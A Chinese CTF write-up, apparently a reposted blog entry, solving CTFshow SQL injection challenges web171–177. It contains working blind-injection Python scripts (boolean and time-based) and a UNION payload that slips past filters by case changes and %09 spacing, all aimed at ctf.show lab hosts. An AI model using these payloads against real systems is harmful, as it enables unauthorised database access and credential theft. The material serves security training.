挖洞可能要暂告一段时间了。从20年到现在22年初我在些漏洞平台获得的一些奖励啥的已经放到了关于本站有兴趣的同学可以蛮看一下
web171
](http://cn-sec.com/wp-content/uploads/2025/01/20250111041426-6781f022ea1e2.png "29074-ge4zqpuzmx5.png")
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";
由sql查询语句可知,这里是由单引号包围的字符型注入.有一点奇怪的地方是,这里select的字段为2个(且没有select id值下方不可能存在id的结果)。按理order by出来应为字段数为2.估计是出题人展示错了sql查询语句。
](http://cn-sec.com/wp-content/uploads/2025/01/20250111041427-6781f02311dbc.png "89707-0k9707u6frlk.png")
查看下回显处,这里三个字段都有回显随便挑一个查询完事(这里不多说了很基础的东西,具体想看的翻我前面sqli靶场文章)](http://cn-sec.com/wp-content/uploads/2025/01/20250111041427-6781f02324fe6.png "13749-2g81ooeyh4a.png")
web172
](http://cn-sec.com/wp-content/uploads/2025/01/20250111041427-6781f0233e11c.png "50428-m8ruq9fh4jj.png")
嗯,第二题就是俩列了。估计上面的查询语句只是用作参考的。](http://cn-sec.com/wp-content/uploads/2025/01/20250111041427-6781f0235b224.png "46696-nxjnjo14kd9.png")
web173
](http://cn-sec.com/wp-content/uploads/2025/01/20250111041427-6781f023775da.png "06977-kdq76eoin0k.png")
web174
](http://cn-sec.com/wp-content/uploads/2025/01/20250111041427-6781f0238cb40.png "82167-l109grg060s.png")
这题将返回数据中含有数字的返回给过滤了。所以我们可以用盲注来获取flag。脚本如下
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@File : web174time.py
@Author: YanXia
@Date : 2022/3/6 18:00
@email : [email protected]
@link:https://535yx.cn
'''
import requests
headers = {'content-type': 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0'}
dict="qazwsxedcrfvtgbyhnujmikolp123456789{}-"
url="http://03214b84-c02b-4c00-8760-fe70aef13270.challenge.ctf.show/api/v4.php"
flag=""
for i in range(1,100):
for s in dict:
payload = "?id=1' and if(substr((select password from ctfshow_user4 where username=\"flag\"),%d,1)=\"%s\",1,0)--+"%(i,s)
r=requests.get(url+payload,headers=headers)
if 'admin' in r.text:
flag+=s
print(flag)
](http://cn-sec.com/wp-content/uploads/2025/01/20250111041427-6781f0239c9f7.png "72888-sbugb4ag49.png")
web175
](http://cn-sec.com/wp-content/uploads/2025/01/20250111041427-6781f023cf89b.png "02782-twcbmxviubd.png")
这题直接将ASCII码0-127的字符都禁止返回了。所以上题的布尔盲注方法就不可以用了。我们可以用时间盲注的方法来做](http://cn-sec.com/wp-content/uploads/2025/01/20250111041427-6781f023e52c0.png "15122-dy37p91rqvg.png")
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@File : web175.py
@Author: YanXia
@Date : 2022/3/6 18:59
@email : [email protected]
@link:https://535yx.cn
'''
import requests,time
headers = {'content-type': 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0'}
dict="qazwsxedcrfvtgbyhnujmikolp123456789{}-"
url="http://02088699-eacd-43e1-acf7-e5baafeabdf3.challenge.ctf.show/api/v5.php"
flag=""
for i in range(1,100):
for s in dict:
payload = "?id=1' and if(substr((select password from ctfshow_user5 where username=\"flag\"),%d,1)=\"%s\",sleep(5),0)--+"%(i,s)
start = time.time()
r=requests.get(url+payload,headers=headers)
end = time.time()
if end-start >4.5:
flag+=s
print(flag)web176
这题开始就有过滤了。下图发现被ban了](http://cn-sec.com/wp-content/uploads/2025/01/20250111041428-6781f024244a8.png "40274-ys6xpab2ffa.png")
经过测试,只是select被过滤。可以利用大小写绕过](http://cn-sec.com/wp-content/uploads/2025/01/20250111041428-6781f0243d0b8.png "50462-4dhrx138cey.png")
最后得到](http://cn-sec.com/wp-content/uploads/2025/01/20250111041428-6781f0245ae3a.png "81854-fsqr5yx5aig.png")
web177
这里过滤了空格,我们可以用%09来代替空格](http://cn-sec.com/wp-content/uploads/2025/01/20250111041428-6781f02480352.png "73978-is9ppihy04a.png")
](http://cn-sec.com/wp-content/uploads/2025/01/20250111041428-6781f024943c8.png "97667-s88ioxhu369.png")
payload:-1'%09union%09select%091,2,password%09from%09ctfshow_user--%09
©著作权归作者所有 - source: 535yx.cn
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论